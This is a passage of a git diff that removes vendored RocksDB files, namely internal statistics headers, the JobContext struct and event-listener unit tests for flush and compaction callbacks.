-  // DBPropertyInfo struct used internally for retrieving properties.
-  static const std::unordered_map<std::string, DBPropertyInfo> ppt_name_to_info;
-
- private:
-  void DumpDBStats(std::string* value);
-  void DumpCFMapStats(std::map<std::string, double>* cf_stats);
-  void DumpCFMapStats(
-      std::map<int, std::map<LevelStatType, double>>* level_stats,
-      CompactionStats* compaction_stats_sum);
-  void DumpCFStats(std::string* value);
-  void DumpCFStatsNoFileHistogram(std::string* value);
-  void DumpCFFileHistogram(std::string* value);
-
-  // Per-DB stats
-  std::atomic<uint64_t> db_stats_[INTERNAL_DB_STATS_ENUM_MAX];
-  // Per-ColumnFamily stats
-  uint64_t cf_stats_value_[INTERNAL_CF_STATS_ENUM_MAX];
-  uint64_t cf_stats_count_[INTERNAL_CF_STATS_ENUM_MAX];
-  // Per-ColumnFamily/level compaction stats
-  std::vector<CompactionStats> comp_stats_;
-  std::vector<HistogramImpl> file_read_latency_;
-
-  // Used to compute per-interval statistics
-  struct CFStatsSnapshot {
-    // ColumnFamily-level stats
-    CompactionStats comp_stats;
-    uint64_t ingest_bytes_flush;      // Bytes written to L0 (Flush)
-    uint64_t stall_count;             // Stall count
-    // Stats from compaction jobs - bytes written, bytes read, duration.
-    uint64_t compact_bytes_write;
-    uint64_t compact_bytes_read;
-    uint64_t compact_micros;
-    double seconds_up;
-
-    // AddFile specific stats
-    uint64_t ingest_bytes_addfile;     // Total Bytes ingested
-    uint64_t ingest_files_addfile;     // Total number of files ingested
-    uint64_t ingest_l0_files_addfile;  // Total number of files ingested to L0
-    uint64_t ingest_keys_addfile;      // Total number of keys ingested
-
-    CFStatsSnapshot()
-        : comp_stats(0),
-          ingest_bytes_flush(0),
-          stall_count(0),
-          compact_bytes_write(0),
-          compact_bytes_read(0),
-          compact_micros(0),
-          seconds_up(0),
-          ingest_bytes_addfile(0),
-          ingest_files_addfile(0),
-          ingest_l0_files_addfile(0),
-          ingest_keys_addfile(0) {}
-
-    void Clear() {
-      comp_stats.Clear();
-      ingest_bytes_flush = 0;
-      stall_count = 0;
-      compact_bytes_write = 0;
-      compact_bytes_read = 0;
-      compact_micros = 0;
-      seconds_up = 0;
-      ingest_bytes_addfile = 0;
-      ingest_files_addfile = 0;
-      ingest_l0_files_addfile = 0;
-      ingest_keys_addfile = 0;
-    }
-  } cf_stats_snapshot_;
-
-  struct DBStatsSnapshot {
-    // DB-level stats
-    uint64_t ingest_bytes;            // Bytes written by user
-    uint64_t wal_bytes;               // Bytes written to WAL
-    uint64_t wal_synced;              // Number of times WAL is synced
-    uint64_t write_with_wal;          // Number of writes that request WAL
-    // These count the number of writes processed by the calling thread or
-    // another thread.
-    uint64_t write_other;
-    uint64_t write_self;
-    // Total number of keys written. write_self and write_other measure number
-    // of write requests written, Each of the write request can contain updates
-    // to multiple keys. num_keys_written is total number of keys updated by all
-    // those writes.
-    uint64_t num_keys_written;
-    // Total time writes delayed by stalls.
-    uint64_t write_stall_micros;
-    double seconds_up;
-
-    DBStatsSnapshot()
-        : ingest_bytes(0),
-          wal_bytes(0),
-          wal_synced(0),
-          write_with_wal(0),
-          write_other(0),
-          write_self(0),
-          num_keys_written(0),
-          write_stall_micros(0),
-          seconds_up(0) {}
-
-    void Clear() {
-      ingest_bytes = 0;
-      wal_bytes = 0;
-      wal_synced = 0;
-      write_with_wal = 0;
-      write_other = 0;
-      write_self = 0;
-      num_keys_written = 0;
-      write_stall_micros = 0;
-      seconds_up = 0;
-    }
-  } db_stats_snapshot_;
-
-  // Handler functions for getting property values. They use "value" as a value-
-  // result argument, and return true upon successfully setting "value".
-  bool HandleNumFilesAtLevel(std::string* value, Slice suffix);
-  bool HandleCompressionRatioAtLevelPrefix(std::string* value, Slice suffix);
-  bool HandleLevelStats(std::string* value, Slice suffix);
-  bool HandleStats(std::string* value, Slice suffix);
-  bool HandleCFMapStats(std::map<std::string, double>* compaction_stats);
-  bool HandleCFStats(std::string* value, Slice suffix);
-  bool HandleCFStatsNoFileHistogram(std::string* value, Slice suffix);
-  bool HandleCFFileHistogram(std::string* value, Slice suffix);
-  bool HandleDBStats(std::string* value, Slice suffix);
-  bool HandleSsTables(std::string* value, Slice suffix);
-  bool HandleAggregatedTableProperties(std::string* value, Slice suffix);
-  bool HandleAggregatedTablePropertiesAtLevel(std::string* value, Slice suffix);
-  bool HandleNumImmutableMemTable(uint64_t* value, DBImpl* db,
-                                  Version* version);
-  bool HandleNumImmutableMemTableFlushed(uint64_t* value, DBImpl* db,
-                                         Version* version);
-  bool HandleMemTableFlushPending(uint64_t* value, DBImpl* db,
-                                  Version* version);
-  bool HandleNumRunningFlushes(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleCompactionPending(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleNumRunningCompactions(uint64_t* value, DBImpl* db,
-                                   Version* version);
-  bool HandleBackgroundErrors(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* db,
-                                   Version* version);
-  bool HandleCurSizeAllMemTables(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleSizeAllMemTables(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleNumEntriesActiveMemTable(uint64_t* value, DBImpl* db,
-                                      Version* version);
-  bool HandleNumEntriesImmMemTables(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool HandleNumDeletesActiveMemTable(uint64_t* value, DBImpl* db,
-                                      Version* version);
-  bool HandleNumDeletesImmMemTables(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool HandleEstimateNumKeys(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleNumSnapshots(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleOldestSnapshotTime(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleNumLiveVersions(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleCurrentSuperVersionNumber(uint64_t* value, DBImpl* db,
-                                       Version* version);
-  bool HandleIsFileDeletionsEnabled(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool HandleBaseLevel(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleTotalSstFilesSize(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleEstimatePendingCompactionBytes(uint64_t* value, DBImpl* db,
-                                            Version* version);
-  bool HandleEstimateTableReadersMem(uint64_t* value, DBImpl* db,
-                                     Version* version);
-  bool HandleEstimateLiveDataSize(uint64_t* value, DBImpl* db,
-                                  Version* version);
-  bool HandleMinLogNumberToKeep(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool HandleIsWriteStopped(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* db,
-                                   Version* version);
-
-  // Total number of background errors encountered. Every time a flush task
-  // or compaction task fails, this counter is incremented. The failure can
-  // be caused by any possible reason, including file system errors, out of
-  // resources, or input file corruption. Failing when retrying the same flush
-  // or compaction will cause the counter to increase too.
-  uint64_t bg_error_count_;
-
-  const int number_levels_;
-  Env* env_;
-  ColumnFamilyData* cfd_;
-  uint64_t started_at_;
-};
-
-#else
-
-class InternalStats {
- public:
-  enum InternalCFStatsType {
-    LEVEL0_SLOWDOWN_TOTAL,
-    LEVEL0_SLOWDOWN_WITH_COMPACTION,
-    MEMTABLE_COMPACTION,
-    MEMTABLE_SLOWDOWN,
-    LEVEL0_NUM_FILES_TOTAL,
-    LEVEL0_NUM_FILES_WITH_COMPACTION,
-    SOFT_PENDING_COMPACTION_BYTES_LIMIT,
-    HARD_PENDING_COMPACTION_BYTES_LIMIT,
-    WRITE_STALLS_ENUM_MAX,
-    BYTES_FLUSHED,
-    BYTES_INGESTED_ADD_FILE,
-    INGESTED_NUM_FILES_TOTAL,
-    INGESTED_LEVEL0_NUM_FILES_TOTAL,
-    INGESTED_NUM_KEYS_TOTAL,
-    INTERNAL_CF_STATS_ENUM_MAX,
-  };
-
-  enum InternalDBStatsType {
-    WAL_FILE_BYTES,
-    WAL_FILE_SYNCED,
-    BYTES_WRITTEN,
-    NUMBER_KEYS_WRITTEN,
-    WRITE_DONE_BY_OTHER,
-    WRITE_DONE_BY_SELF,
-    WRITE_WITH_WAL,
-    WRITE_STALL_MICROS,
-    INTERNAL_DB_STATS_ENUM_MAX,
-  };
-
-  InternalStats(int num_levels, Env* env, ColumnFamilyData* cfd) {}
-
-  struct CompactionStats {
-    uint64_t micros;
-    uint64_t bytes_read_non_output_levels;
-    uint64_t bytes_read_output_level;
-    uint64_t bytes_written;
-    uint64_t bytes_moved;
-    int num_input_files_in_non_output_levels;
-    int num_input_files_in_output_level;
-    int num_output_files;
-    uint64_t num_input_records;
-    uint64_t num_dropped_records;
-    int count;
-
-    explicit CompactionStats(int _count = 0) {}
-
-    explicit CompactionStats(const CompactionStats& c) {}
-
-    void Add(const CompactionStats& c) {}
-
-    void Subtract(const CompactionStats& c) {}
-  };
-
-  void AddCompactionStats(int level, const CompactionStats& stats) {}
-
-  void IncBytesMoved(int level, uint64_t amount) {}
-
-  void AddCFStats(InternalCFStatsType type, uint64_t value) {}
-
-  void AddDBStats(InternalDBStatsType type, uint64_t value,
-                  bool concurrent = false) {}
-
-  HistogramImpl* GetFileReadHist(int level) { return nullptr; }
-
-  uint64_t GetBackgroundErrorCount() const { return 0; }
-
-  uint64_t BumpAndGetBackgroundErrorCount() { return 0; }
-
-  bool GetStringProperty(const DBPropertyInfo& property_info,
-                         const Slice& property, std::string* value) {
-    return false;
-  }
-
-  bool GetMapProperty(const DBPropertyInfo& property_info,
-                      const Slice& property,
-                      std::map<std::string, double>* value) {
-    return false;
-  }
-
-  bool GetIntProperty(const DBPropertyInfo& property_info, uint64_t* value,
-                      DBImpl* db) const {
-    return false;
-  }
-
-  bool GetIntPropertyOutOfMutex(const DBPropertyInfo& property_info,
-                                Version* version, uint64_t* value) const {
-    return false;
-  }
-};
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/job_context.h b/thirdparty/rocksdb/db/job_context.h
deleted file mode 100644
index 950a3a6..0000000
--- a/thirdparty/rocksdb/db/job_context.h
+++ /dev/null
@@ -1,129 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <string>
-#include <vector>
-
-#include "db/log_writer.h"
-
-namespace rocksdb {
-
-class MemTable;
-
-struct JobContext {
-  inline bool HaveSomethingToDelete() const {
-    return full_scan_candidate_files.size() || sst_delete_files.size() ||
-           log_delete_files.size() || manifest_delete_files.size() ||
-           new_superversion != nullptr || superversions_to_free.size() > 0 ||
-           memtables_to_free.size() > 0 || logs_to_free.size() > 0;
-  }
-
-  // Structure to store information for candidate files to delete.
-  struct CandidateFileInfo {
-    std::string file_name;
-    uint32_t path_id;
-    CandidateFileInfo(std::string name, uint32_t path)
-        : file_name(std::move(name)), path_id(path) {}
-    bool operator==(const CandidateFileInfo& other) const {
-      return file_name == other.file_name && path_id == other.path_id;
-    }
-  };
-
-  // Unique job id
-  int job_id;
-
-  // a list of all files that we'll consider deleting
-  // (every once in a while this is filled up with all files
-  // in the DB directory)
-  // (filled only if we're doing full scan)
-  std::vector<CandidateFileInfo> full_scan_candidate_files;
-
-  // the list of all live sst files that cannot be deleted
-  std::vector<FileDescriptor> sst_live;
-
-  // a list of sst files that we need to delete
-  std::vector<FileMetaData*> sst_delete_files;
-
-  // a list of log files that we need to delete
-  std::vector<uint64_t> log_delete_files;
-
-  // a list of log files that we need to preserve during full purge since they
-  // will be reused later
-  std::vector<uint64_t> log_recycle_files;
-
-  // a list of manifest files that we need to delete
-  std::vector<std::string> manifest_delete_files;
-
-  // a list of memtables to be free
-  autovector<MemTable*> memtables_to_free;
-
-  autovector<SuperVersion*> superversions_to_free;
-
-  autovector<log::Writer*> logs_to_free;
-
-  SuperVersion* new_superversion;  // if nullptr no new superversion
-
-  // the current manifest_file_number, log_number and prev_log_number
-  // that corresponds to the set of files in 'live'.
-  uint64_t manifest_file_number;
-  uint64_t pending_manifest_file_number;
-  uint64_t log_number;
-  uint64_t prev_log_number;
-
-  uint64_t min_pending_output = 0;
-  uint64_t prev_total_log_size = 0;
-  size_t num_alive_log_files = 0;
-  uint64_t size_log_to_delete = 0;
-
-  explicit JobContext(int _job_id, bool create_superversion = false) {
-    job_id = _job_id;
-    manifest_file_number = 0;
-    pending_manifest_file_number = 0;
-    log_number = 0;
-    prev_log_number = 0;
-    new_superversion = create_superversion ? new SuperVersion() : nullptr;
-  }
-
-  // For non-empty JobContext Clean() has to be called at least once before
-  // before destruction (see asserts in ~JobContext()). Should be called with
-  // unlocked DB mutex. Destructor doesn't call Clean() to avoid accidentally
-  // doing potentially slow Clean() with locked DB mutex.
-  void Clean() {
-    // free pending memtables
-    for (auto m : memtables_to_free) {
-      delete m;
-    }
-    // free superversions
-    for (auto s : superversions_to_free) {
-      delete s;
-    }
-    for (auto l : logs_to_free) {
-      delete l;
-    }
-    // if new_superversion was not used, it will be non-nullptr and needs
-    // to be freed here
-    delete new_superversion;
-
-    memtables_to_free.clear();
-    superversions_to_free.clear();
-    logs_to_free.clear();
-    new_superversion = nullptr;
-  }
-
-  ~JobContext() {
-    assert(memtables_to_free.size() == 0);
-    assert(superversions_to_free.size() == 0);
-    assert(new_superversion == nullptr);
-    assert(logs_to_free.size() == 0);
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/listener_test.cc b/thirdparty/rocksdb/db/listener_test.cc
deleted file mode 100644
index 5b5f226..0000000
--- a/thirdparty/rocksdb/db/listener_test.cc
+++ /dev/null
@@ -1,895 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "db/dbformat.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "memtable/hash_linklist_rep.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "table/block_based_table_factory.h"
-#include "table/plain_table_factory.h"
-#include "util/filename.h"
-#include "util/hash.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/rate_limiter.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-#ifndef ROCKSDB_LITE
-
-namespace rocksdb {
-
-class EventListenerTest : public DBTestBase {
- public:
-  EventListenerTest() : DBTestBase("/listener_test") {}
-
-  const size_t k110KB = 110 << 10;
-};
-
-struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector {
-  virtual rocksdb::Status AddUserKey(const rocksdb::Slice& key,
-                                     const rocksdb::Slice& value,
-                                     rocksdb::EntryType type,
-                                     rocksdb::SequenceNumber seq,
-                                     uint64_t file_size) override {
-    return Status::OK();
-  }
-  virtual rocksdb::Status Finish(
-      rocksdb::UserCollectedProperties* properties) override {
-    properties->insert({"0", "1"});
-    return Status::OK();
-  }
-
-  virtual const char* Name() const override {
-    return "TestTablePropertiesCollector";
-  }
-
-  rocksdb::UserCollectedProperties GetReadableProperties() const override {
-    rocksdb::UserCollectedProperties ret;
-    ret["2"] = "3";
-    return ret;
-  }
-};
-
-class TestPropertiesCollectorFactory : public TablePropertiesCollectorFactory {
- public:
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    return new TestPropertiesCollector;
-  }
-  const char* Name() const override { return "TestTablePropertiesCollector"; }
-};
-
-class TestCompactionListener : public EventListener {
- public:
-  void OnCompactionCompleted(DB *db, const CompactionJobInfo& ci) override {
-    std::lock_guard<std::mutex> lock(mutex_);
-    compacted_dbs_.push_back(db);
-    ASSERT_GT(ci.input_files.size(), 0U);
-    ASSERT_GT(ci.output_files.size(), 0U);
-    ASSERT_EQ(db->GetEnv()->GetThreadID(), ci.thread_id);
-    ASSERT_GT(ci.thread_id, 0U);
-
-    for (auto fl : {ci.input_files, ci.output_files}) {
-      for (auto fn : fl) {
-        auto it = ci.table_properties.find(fn);
-        ASSERT_NE(it, ci.table_properties.end());
-        auto tp = it->second;
-        ASSERT_TRUE(tp != nullptr);
-        ASSERT_EQ(tp->user_collected_properties.find("0")->second, "1");
-      }
-    }
-  }
-
-  std::vector<DB*> compacted_dbs_;
-  std::mutex mutex_;
-};
-
-TEST_F(EventListenerTest, OnSingleDBCompactionTest) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 100;
-  const int kNumL0Files = 4;
-
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base = options.target_file_size_base * 2;
-  options.max_bytes_for_level_multiplier = 2;
-  options.compression = kNoCompression;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-
-  TestCompactionListener* listener = new TestCompactionListener();
-  options.listeners.emplace_back(listener);
-  std::vector<std::string> cf_names = {
-      "pikachu", "ilya", "muromec", "dobrynia",
-      "nikitich", "alyosha", "popovich"};
-  CreateAndReopenWithCF(cf_names, options);
-  ASSERT_OK(Put(1, "pikachu", std::string(90000, 'p')));
-  ASSERT_OK(Put(2, "ilya", std::string(90000, 'i')));
-  ASSERT_OK(Put(3, "muromec", std::string(90000, 'm')));
-  ASSERT_OK(Put(4, "dobrynia", std::string(90000, 'd')));
-  ASSERT_OK(Put(5, "nikitich", std::string(90000, 'n')));
-  ASSERT_OK(Put(6, "alyosha", std::string(90000, 'a')));
-  ASSERT_OK(Put(7, "popovich", std::string(90000, 'p')));
-  for (int i = 1; i < 8; ++i) {
-    ASSERT_OK(Flush(i));
-    const Slice kRangeStart = "a";
-    const Slice kRangeEnd = "z";
-    ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), handles_[i],
-                                     &kRangeStart, &kRangeEnd));
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  ASSERT_EQ(listener->compacted_dbs_.size(), cf_names.size());
-  for (size_t i = 0; i < cf_names.size(); ++i) {
-    ASSERT_EQ(listener->compacted_dbs_[i], db_);
-  }
-}
-
-// This simple Listener can only handle one flush at a time.
-class TestFlushListener : public EventListener {
- public:
-  explicit TestFlushListener(Env* env)
-      : slowdown_count(0), stop_count(0), db_closed(), env_(env) {
-    db_closed = false;
-  }
-  void OnTableFileCreated(
-      const TableFileCreationInfo& info) override {
-    // remember the info for later checking the FlushJobInfo.
-    prev_fc_info_ = info;
-    ASSERT_GT(info.db_name.size(), 0U);
-    ASSERT_GT(info.cf_name.size(), 0U);
-    ASSERT_GT(info.file_path.size(), 0U);
-    ASSERT_GT(info.job_id, 0);
-    ASSERT_GT(info.table_properties.data_size, 0U);
-    ASSERT_GT(info.table_properties.raw_key_size, 0U);
-    ASSERT_GT(info.table_properties.raw_value_size, 0U);
-    ASSERT_GT(info.table_properties.num_data_blocks, 0U);
-    ASSERT_GT(info.table_properties.num_entries, 0U);
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-    // Verify the id of the current thread that created this table
-    // file matches the id of any active flush or compaction thread.
-    uint64_t thread_id = env_->GetThreadID();
-    std::vector<ThreadStatus> thread_list;
-    ASSERT_OK(env_->GetThreadList(&thread_list));
-    bool found_match = false;
-    for (auto thread_status : thread_list) {
-      if (thread_status.operation_type == ThreadStatus::OP_FLUSH ||
-          thread_status.operation_type == ThreadStatus::OP_COMPACTION) {
-        if (thread_id == thread_status.thread_id) {
-          found_match = true;
-          break;
-        }
-      }
-    }
-    ASSERT_TRUE(found_match);
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  }
-
-  void OnFlushCompleted(
-      DB* db, const FlushJobInfo& info) override {
-    flushed_dbs_.push_back(db);
-    flushed_column_family_names_.push_back(info.cf_name);
-    if (info.triggered_writes_slowdown) {
-      slowdown_count++;
-    }
-    if (info.triggered_writes_stop) {
-      stop_count++;
-    }
-    // verify whether the previously created file matches the flushed file.
-    ASSERT_EQ(prev_fc_info_.db_name, db->GetName());
-    ASSERT_EQ(prev_fc_info_.cf_name, info.cf_name);
-    ASSERT_EQ(prev_fc_info_.job_id, info.job_id);
-    ASSERT_EQ(prev_fc_info_.file_path, info.file_path);
-    ASSERT_EQ(db->GetEnv()->GetThreadID(), info.thread_id);
-    ASSERT_GT(info.thread_id, 0U);
-    ASSERT_EQ(info.table_properties.user_collected_properties.find("0")->second,
-              "1");
-  }
-
-  std::vector<std::string> flushed_column_family_names_;
-  std::vector<DB*> flushed_dbs_;
-  int slowdown_count;
-  int stop_count;
-  bool db_closing;
-  std::atomic_bool db_closed;
-  TableFileCreationInfo prev_fc_info_;
-
- protected:
-  Env* env_;
-};
-
-TEST_F(EventListenerTest, OnSingleDBFlushTest) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.write_buffer_size = k110KB;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  TestFlushListener* listener = new TestFlushListener(options.env);
-  options.listeners.emplace_back(listener);
-  std::vector<std::string> cf_names = {
-      "pikachu", "ilya", "muromec", "dobrynia",
-      "nikitich", "alyosha", "popovich"};
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-  CreateAndReopenWithCF(cf_names, options);
-
-  ASSERT_OK(Put(1, "pikachu", std::string(90000, 'p')));
-  ASSERT_OK(Put(2, "ilya", std::string(90000, 'i')));
-  ASSERT_OK(Put(3, "muromec", std::string(90000, 'm')));
-  ASSERT_OK(Put(4, "dobrynia", std::string(90000, 'd')));
-  ASSERT_OK(Put(5, "nikitich", std::string(90000, 'n')));
-  ASSERT_OK(Put(6, "alyosha", std::string(90000, 'a')));
-  ASSERT_OK(Put(7, "popovich", std::string(90000, 'p')));
-  for (int i = 1; i < 8; ++i) {
-    ASSERT_OK(Flush(i));
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(listener->flushed_dbs_.size(), i);
-    ASSERT_EQ(listener->flushed_column_family_names_.size(), i);
-  }
-
-  // make sure call-back functions are called in the right order
-  for (size_t i = 0; i < cf_names.size(); ++i) {
-    ASSERT_EQ(listener->flushed_dbs_[i], db_);
-    ASSERT_EQ(listener->flushed_column_family_names_[i], cf_names[i]);
-  }
-}
-
-TEST_F(EventListenerTest, MultiCF) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.write_buffer_size = k110KB;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  TestFlushListener* listener = new TestFlushListener(options.env);
-  options.listeners.emplace_back(listener);
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-  std::vector<std::string> cf_names = {
-      "pikachu", "ilya", "muromec", "dobrynia",
-      "nikitich", "alyosha", "popovich"};
-  CreateAndReopenWithCF(cf_names, options);
-
-  ASSERT_OK(Put(1, "pikachu", std::string(90000, 'p')));
-  ASSERT_OK(Put(2, "ilya", std::string(90000, 'i')));
-  ASSERT_OK(Put(3, "muromec", std::string(90000, 'm')));
-  ASSERT_OK(Put(4, "dobrynia", std::string(90000, 'd')));
-  ASSERT_OK(Put(5, "nikitich", std::string(90000, 'n')));
-  ASSERT_OK(Put(6, "alyosha", std::string(90000, 'a')));
-  ASSERT_OK(Put(7, "popovich", std::string(90000, 'p')));
-  for (int i = 1; i < 8; ++i) {
-    ASSERT_OK(Flush(i));
-    ASSERT_EQ(listener->flushed_dbs_.size(), i);
-    ASSERT_EQ(listener->flushed_column_family_names_.size(), i);
-  }
-
-  // make sure call-back functions are called in the right order
-  for (size_t i = 0; i < cf_names.size(); i++) {
-    ASSERT_EQ(listener->flushed_dbs_[i], db_);
-    ASSERT_EQ(listener->flushed_column_family_names_[i], cf_names[i]);
-  }
-}
-
-TEST_F(EventListenerTest, MultiDBMultiListeners) {
-  Options options;
-  options.env = CurrentOptions().env;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-  std::vector<TestFlushListener*> listeners;
-  const int kNumDBs = 5;
-  const int kNumListeners = 10;
-  for (int i = 0; i < kNumListeners; ++i) {
-    listeners.emplace_back(new TestFlushListener(options.env));
-  }
-
-  std::vector<std::string> cf_names = {
-      "pikachu", "ilya", "muromec", "dobrynia",
-      "nikitich", "alyosha", "popovich"};
-
-  options.create_if_missing = true;
-  for (int i = 0; i < kNumListeners; ++i) {
-    options.listeners.emplace_back(listeners[i]);
-  }
-  DBOptions db_opts(options);
-  ColumnFamilyOptions cf_opts(options);
-
-  std::vector<DB*> dbs;
-  std::vector<std::vector<ColumnFamilyHandle *>> vec_handles;
-
-  for (int d = 0; d < kNumDBs; ++d) {
-    ASSERT_OK(DestroyDB(dbname_ + ToString(d), options));
-    DB* db;
-    std::vector<ColumnFamilyHandle*> handles;
-    ASSERT_OK(DB::Open(options, dbname_ + ToString(d), &db));
-    for (size_t c = 0; c < cf_names.size(); ++c) {
-      ColumnFamilyHandle* handle;
-      db->CreateColumnFamily(cf_opts, cf_names[c], &handle);
-      handles.push_back(handle);
-    }
-
-    vec_handles.push_back(std::move(handles));
-    dbs.push_back(db);
-  }
-
-  for (int d = 0; d < kNumDBs; ++d) {
-    for (size_t c = 0; c < cf_names.size(); ++c) {
-      ASSERT_OK(dbs[d]->Put(WriteOptions(), vec_handles[d][c],
-                cf_names[c], cf_names[c]));
-    }
-  }
-
-  for (size_t c = 0; c < cf_names.size(); ++c) {
-    for (int d = 0; d < kNumDBs; ++d) {
-      ASSERT_OK(dbs[d]->Flush(FlushOptions(), vec_handles[d][c]));
-      reinterpret_cast<DBImpl*>(dbs[d])->TEST_WaitForFlushMemTable();
-    }
-  }
-
-  for (auto* listener : listeners) {
-    int pos = 0;
-    for (size_t c = 0; c < cf_names.size(); ++c) {
-      for (int d = 0; d < kNumDBs; ++d) {
-        ASSERT_EQ(listener->flushed_dbs_[pos], dbs[d]);
-        ASSERT_EQ(listener->flushed_column_family_names_[pos], cf_names[c]);
-        pos++;
-      }
-    }
-  }
-
-
-  for (auto handles : vec_handles) {
-    for (auto h : handles) {
-      delete h;
-    }
-    handles.clear();
-  }
-  vec_handles.clear();
-
-  for (auto db : dbs) {
-    delete db;
-  }
-}
-
-TEST_F(EventListenerTest, DisableBGCompaction) {
-  Options options;
-  options.env = CurrentOptions().env;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  TestFlushListener* listener = new TestFlushListener(options.env);
-  const int kCompactionTrigger = 1;
-  const int kSlowdownTrigger = 5;
-  const int kStopTrigger = 100;
-  options.level0_file_num_compaction_trigger = kCompactionTrigger;
-  options.level0_slowdown_writes_trigger = kSlowdownTrigger;
-  options.level0_stop_writes_trigger = kStopTrigger;
-  options.max_write_buffer_number = 10;
-  options.listeners.emplace_back(listener);
-  // BG compaction is disabled.  Number of L0 files will simply keeps
-  // increasing in this test.
-  options.compaction_style = kCompactionStyleNone;
-  options.compression = kNoCompression;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ColumnFamilyMetaData cf_meta;
-  db_->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-
-  // keep writing until writes are forced to stop.
-  for (int i = 0; static_cast<int>(cf_meta.file_count) < kSlowdownTrigger * 10;
-       ++i) {
-    Put(1, ToString(i), std::string(10000, 'x'), WriteOptions());
-    db_->Flush(FlushOptions(), handles_[1]);
-    db_->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  }
-  ASSERT_GE(listener->slowdown_count, kSlowdownTrigger * 9);
-}
-
-class TestCompactionReasonListener : public EventListener {
- public:
-  void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override {
-    std::lock_guard<std::mutex> lock(mutex_);
-    compaction_reasons_.push_back(ci.compaction_reason);
-  }
-
-  std::vector<CompactionReason> compaction_reasons_;
-  std::mutex mutex_;
-};
-
-TEST_F(EventListenerTest, CompactionReasonLevel) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(
